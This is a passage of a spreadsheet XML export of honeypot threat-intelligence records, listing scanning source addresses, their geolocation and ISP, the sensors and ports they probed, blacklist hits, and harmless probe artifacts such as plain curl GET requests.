    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:e504"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3173"/>
    <x v="3173"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:30:21"/>
    <d v="2025-04-04T12:29:12"/>
    <d v="2025-04-04T12:30:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c3:d061"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3174"/>
    <x v="3174"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:28:37"/>
    <d v="2025-04-04T12:22:43"/>
    <d v="2025-04-04T12:28:37"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="SC"/>
    <s v="South Carolina"/>
    <s v="Dorchester"/>
    <s v="Summerville"/>
    <s v="4597919"/>
    <s v="29483"/>
    <s v="33.0185"/>
    <s v="-80.1757"/>
    <s v="7018"/>
    <s v="AT&amp;T Enterprises, LLC"/>
    <s v="AT&amp;T Enterprises, LLC"/>
    <s v="business"/>
    <s v="AT&amp;T Corp"/>
    <s v="2006-02-28"/>
    <s v="SBCIS-SBIS-6BLK"/>
    <s v="2024-12-05"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4b2c:15b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3175"/>
    <x v="3175"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:24:43"/>
    <d v="2024-03-13T21:22:58"/>
    <d v="2025-04-04T12:24:43"/>
    <n v="8994"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H13&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_RDP_H16"/>
    <s v="3389&amp;&amp;54534&amp;&amp;22&amp;&amp;62828&amp;&amp;21&amp;&amp;52957"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw (Mokotów)"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.1957"/>
    <s v="20.9921"/>
    <s v="201814"/>
    <s v="MEVSPACE sp. z o.o."/>
    <s v="MEVSPACE sp. z o.o."/>
    <s v="hosting"/>
    <s v="MEVSPACE sp. z o.o"/>
    <s v="2013-01-18"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b910:26a6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3176"/>
    <x v="3176"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:16:11"/>
    <d v="2025-04-04T08:53:43"/>
    <d v="2025-04-04T12:16:11"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Ambala"/>
    <s v="Ambāla"/>
    <s v="1278860"/>
    <s v="133001"/>
    <s v="30.3752"/>
    <s v="76.7821"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:2bac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3177"/>
    <x v="3177"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:15:16"/>
    <d v="2025-04-04T09:08:44"/>
    <d v="2025-04-04T12:15:16"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="AR"/>
    <s v="Aragon"/>
    <s v="Saragossa"/>
    <s v="Zaragoza"/>
    <s v="3104324"/>
    <s v="50090"/>
    <s v="41.6561"/>
    <s v="-0.8773400000000001"/>
    <s v="57269"/>
    <s v="DIGI SPAIN TELECOM S.L.U."/>
    <s v="Digi Spain Telecom S.L.U."/>
    <s v="business"/>
    <s v="Digi Spain Telecom S.L"/>
    <s v="2007-05-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f74:242a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3178"/>
    <x v="3178"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:09:24"/>
    <d v="2025-04-02T17:07:14"/>
    <d v="2025-04-04T12:09:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.81899"/>
    <s v="39.2867"/>
    <s v="33765"/>
    <s v="TANZANIA TELECOMMUNICATIONS CO. LTD"/>
    <s v="Tanzania Telecommunications CO. LTD"/>
    <s v="business"/>
    <s v="TTCL"/>
    <s v="2010-04-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:924a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3179"/>
    <x v="3179"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:08:06"/>
    <d v="2025-04-04T10:35:08"/>
    <d v="2025-04-04T12:08:06"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H6"/>
    <s v="5432&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:c83d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3180"/>
    <x v="3180"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:07:43"/>
    <d v="2024-12-22T14:15:20"/>
    <d v="2025-04-04T12:07:43"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:f5a0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3181"/>
    <x v="3181"/>
    <s v="220-135-110-129.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:01:03"/>
    <d v="2023-12-21T11:48:10"/>
    <d v="2025-04-04T12:01:03"/>
    <n v="3358"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_NTP_H32&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;22&amp;&amp;1080&amp;&amp;12230&amp;&amp;23&amp;&amp;NA&amp;&amp;47271"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:6e81"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3182"/>
    <x v="3182"/>
    <s v="114-34-101-210.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:01:03"/>
    <d v="2024-12-24T14:54:48"/>
    <d v="2025-04-04T12:01:03"/>
    <n v="322"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23&amp;&amp;80&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:65d2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3183"/>
    <x v="3183"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:00:59"/>
    <d v="2024-09-02T23:02:00"/>
    <d v="2025-04-04T12:00:59"/>
    <n v="602"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;12148&amp;&amp;23&amp;&amp;32671&amp;&amp;52612&amp;&amp;38390&amp;&amp;17788&amp;&amp;44014&amp;&amp;56224&amp;&amp;35753&amp;&amp;35571&amp;&amp;35775&amp;&amp;35792&amp;&amp;35822&amp;&amp;35809&amp;&amp;35839&amp;&amp;35849&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:800e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3184"/>
    <x v="3184"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:53:16"/>
    <d v="2025-04-03T02:37:03"/>
    <d v="2025-04-04T11:53:16"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa4:cb7e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3185"/>
    <x v="3185"/>
    <s v="nz137l175.bb60246.ctm.net"/>
    <x v="0"/>
    <d v="2025-04-04T11:46:55"/>
    <d v="2025-04-04T11:43:32"/>
    <d v="2025-04-04T11:46:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MO"/>
    <s v="Macao"/>
    <s v="NA"/>
    <s v="Nossa Senhora do Carmo"/>
    <s v="NA"/>
    <s v="Taipa"/>
    <s v="1821263"/>
    <s v="NA"/>
    <s v="22.1597"/>
    <s v="113.564"/>
    <s v="4609"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="business"/>
    <s v="CTM Internet Service"/>
    <s v="2010-12-31"/>
    <s v="CTM-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-12-13 05:00:00"/>
    <s v="2025-12-12 05:00:00"/>
    <s v="2024-11-29 07:05:02"/>
    <s v="['NS3.MACAU.CTM.NET', 'VASSUN1.MACAU.CTM.NET', 'VASSUN2.MACAU.CTM.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3cf6:89af"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3186"/>
    <x v="3186"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:37:03"/>
    <d v="2025-01-19T15:16:51"/>
    <d v="2025-04-04T11:37:03"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Sector 2)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.1097"/>
    <s v="73.0149"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
